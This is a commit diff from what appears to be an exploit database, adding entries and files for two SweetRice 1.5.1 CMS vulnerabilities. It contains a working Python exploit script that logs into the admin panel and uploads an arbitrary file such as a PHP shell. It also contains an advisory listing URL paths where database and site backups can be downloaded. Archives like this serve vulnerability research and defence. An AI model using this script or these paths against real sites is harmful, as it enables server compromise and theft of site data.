DB: 2016-11-07
2 new exploits SweetRice 1.5.1 - Arbitrary File Upload SweetRice 1.5.1 - Backup Disclosure
This commit is contained in:
parent
c65daa1397
commit
1ee96838d2
3 changed files with 89 additions and 0 deletions
|
@ -30774,6 +30774,7 @@ id,file,description,date,author,platform,type,port
|
|||
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0
|
||||
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0
|
||||
34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0
|
||||
40716,platforms/php/webapps/40716.py,"SweetRice 1.5.1 - Arbitrary File Upload",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0
|
||||
34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0
|
||||
34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
|
||||
34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
|
||||
|
@ -30803,6 +30804,7 @@ id,file,description,date,author,platform,type,port
|
|||
34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0
|
||||
34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
|
||||
34085,platforms/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0
|
||||
40718,platforms/php/webapps/40718.txt,"SweetRice 1.5.1 - Backup Disclosure",2016-11-06,"Ashiyane Digital Security Team",php,webapps,0
|
||||
34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0
|
||||
34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80
|
||||
34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
68
platforms/php/webapps/40716.py
Executable file
68
platforms/php/webapps/40716.py
Executable file
|
@ -0,0 +1,68 @@
|
|||
#/usr/bin/python
|
||||
#-*- Coding: utf-8 -*-
|
||||
# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
|
||||
# Exploit Author: Ashiyane Digital Security Team
|
||||
# Date: 03-11-2016
|
||||
# Vendor: http://www.basic-cms.org/
|
||||
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
|
||||
# Version: 1.5.1
|
||||
# Platform: WebApp - PHP - Mysql
|
||||
|
||||
import requests
|
||||
import os
|
||||
from requests import session
|
||||
|
||||
if os.name == 'nt':
|
||||
os.system('cls')
|
||||
else:
|
||||
os.system('clear')
|
||||
pass
|
||||
banner = '''
|
||||
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|
||||
| _________ __ __________.__ |
|
||||
| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |
|
||||
| \_____ \\ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |
|
||||
| / \\ /\ ___/\ ___/| | | | \ \ \__\ ___/ |
|
||||
|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |
|
||||
| \/ \/ \/ \/ \/ \/ |
|
||||
| > SweetRice 1.5.1 Unrestricted File Upload |
|
||||
| > Script Cod3r : Ehsan Hosseini |
|
||||
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|
||||
'''
|
||||
|
||||
print(banner)
|
||||
|
||||
|
||||
# Get Host & User & Pass & filename
|
||||
host = input("Enter The Target URL(Example : localhost.com) : ")
|
||||
username = input("Enter Username : ")
|
||||
password = input("Enter Password : ")
|
||||
filename = input("Enter FileName (Example:.htaccess,shell.php5,index.html) : ")
|
||||
file = {'upload[]': open(filename, 'rb')}
|
||||
|
||||
payload = {
|
||||
'user':username,
|
||||
'passwd':password,
|
||||
'rememberMe':''
|
||||
}
|
||||
|
||||
|
||||
|
||||
with session() as r:
|
||||
login = r.post('http://' + host + '/as/?type=signin', data=payload)
|
||||
success = 'Login success'
|
||||
if login.status_code == 200:
|
||||
print("[+] Sending User&Pass...")
|
||||
if login.text.find(success) > 1:
|
||||
print("[+] Login Succssfully...")
|
||||
else:
|
||||
print("[-] User or Pass is incorrent...")
|
||||
print("Good Bye...")
|
||||
exit()
|
||||
pass
|
||||
pass
|
||||
uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)
|
||||
if uploadfile.status_code == 200:
|
||||
print("[+] File Uploaded...")
|
||||
print("[+] URL : http://" + host + "/attachment/" + filename)
|
||||
pass
|
19
platforms/php/webapps/40718.txt
Executable file
19
platforms/php/webapps/40718.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
Title: SweetRice 1.5.1 - Backup Disclosure
|
||||
Application: SweetRice
|
||||
Versions Affected: 1.5.1
|
||||
Vendor URL: http://www.basic-cms.org/
|
||||
Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
|
||||
Discovered by: Ashiyane Digital Security Team
|
||||
Tested on: Windows 10
|
||||
Bugs: Backup Disclosure
|
||||
Date: 16-Sept-2016
|
||||
|
||||
|
||||
Proof of Concept :
|
||||
|
||||
You can access to all mysql backup and download them from this directory.
|
||||
http://localhost/inc/mysql_backup
|
||||
|
||||
and can access to website files backup from:
|
||||
http://localhost/SweetRice-transfer.zip
|
||||
|
Loading…
Add table
Reference in a new issue